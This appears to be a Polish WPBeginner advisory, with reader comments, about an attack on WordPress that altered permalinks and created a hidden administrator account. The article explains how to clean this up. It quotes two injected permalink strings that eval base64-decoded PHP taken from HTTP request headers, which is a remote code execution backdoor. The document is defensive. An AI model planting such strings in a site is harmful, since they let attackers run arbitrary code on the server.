Trusted WordPress tutorials, when you need them most.
Beginner’s Guide to WordPress
Puchar WPB
25 Million+
Websites using our plugins
16+
Years of WordPress experience
3000+
WordPress tutorials
by experts

WordPress SQL Injection – najnowszy atak

Wiele witryn zostało ostatnio zaatakowanych przez atak SQL, w wyniku którego kody są wstrzykiwane na twoją witrynę. Ten zastrzyk MySQL ma wpływ na twoje bezpośrednie odnośniki, czyniąc je nieskutecznymi. W rezultacie adresy URL twoich wpisów na blogu nie będą działać. Dzięki Andy’emu Sowardowi za zwrócenie naszej uwagi na ten problem.

Jeden z poniższych kodów został dodany do twojej struktury bezpośrednich odnośników w wyniku tego ataku:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Te cudzysłowy dołączają wszystkie bezpośrednie odnośniki na twojej witrynie i można je zmienić tylko wtedy, gdy są usuwane ręcznie.

Aby to naprawić, przejdź do:

Ustawienia > Bezpośrednie odnośniki i usuwaj powyższy kod i zastąp go twoim domyślnym kodem.

Następną rzeczą, którą musisz zrobić, jest przejście do Użytkownicy. Zobaczysz, że jest więcej niż jeden administrator. Nie zobaczysz ich nazwisk na liście, ale zobaczysz, że ich liczba wzrosła. Musisz więc przejrzeć wszystkich użytkowników i znaleźć ostatniego, który się zarejestrował. Umieść swój kursor myszy nad tym użytkownikiem i uzyskaj odnośnik. Zmień kod userid= dodając 1 do tej liczby. Więc jeśli ostatnim użytkownikiem, którego możesz zobaczyć, był użytkownik #2, dodaj do niego 1 i zrób z niego 3. Powinieneś zauważyć, że ukryty administrator ma dziwny kod jako imię. Usuń kod i uczyń go subskrybentem. Następnie wróć i usuń go.

To powinno naprawić problem. Możesz go również usunąć, po prostu przechodząc do twojego PHPMyAdmin. Zobaczysz tam tego użytkownika.

Chcieliśmy tylko przekazać tę wiadomość tak szybko, jak to możliwe, aby nasi użytkownicy mogli być na bieżąco. Upewnij się, że Twój blog nie jest zainfekowany. Mamy nadzieję, że WordPress wkrótce wyda aktualizację.

Ponadto, jeśli jeszcze nie wdrożyłeś niektórych z tych środków w celu zabezpieczenia twojego obszaru administracyjnego WordPress.

Ujawnienie: Nasze treści są wspierane przez czytelników. Oznacza to, że jeśli klikniesz na niektóre z naszych linków, możemy otrzymać prowizję. Zobacz jak WPBeginner jest finansowany, dlaczego to ma znaczenie i jak możesz nas wspierać. Oto nasz proces redakcyjny.

Avatar

Editorial Staff at WPBeginner is a team of WordPress experts led by Syed Balkhi with over 16 years of experience in WordPress, Web Hosting, eCommerce, SEO, and Marketing. Started in 2009, WPBeginner is now the largest free WordPress resource site in the industry and is often referred to as the Wikipedia for WordPress.

Najlepszy zestaw narzędzi WordPress

Uzyskaj BEZPŁATNY dostęp do naszego zestawu narzędzi - zbiór produktów i zasobów związanych z WordPressem, które każdy profesjonalista powinien mieć!

Reader Interactions

8 komentarzyZostaw odpowiedź

  1. ahmed_alaaedin

    The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!

  2. a wordpress user

    i was hit by this twice.

    first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.

    once they restore my a/c i will remove wordpres.. I have had it!

    • Editorial Staff

      Perhaps its not WordPress fault, maybe your hosting security is just not as good…

      Administrator

    • Joey

      What did you figure out with this? I was just hit with same issue. All my WP sites on my account are suffering the same problem.

    • Editorial Staff

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      Administrator

      • lerrkin

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was „Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

Zostaw odpowiedź

Dziękujemy za pozostawienie komentarza. Pamiętaj, że wszystkie komentarze są moderowane zgodnie z naszymi polityka komentarzy, a Twój adres e-mail NIE zostanie opublikowany. NIE używaj słów kluczowych w polu nazwy. Przeprowadźmy osobistą i konstruktywną rozmowę.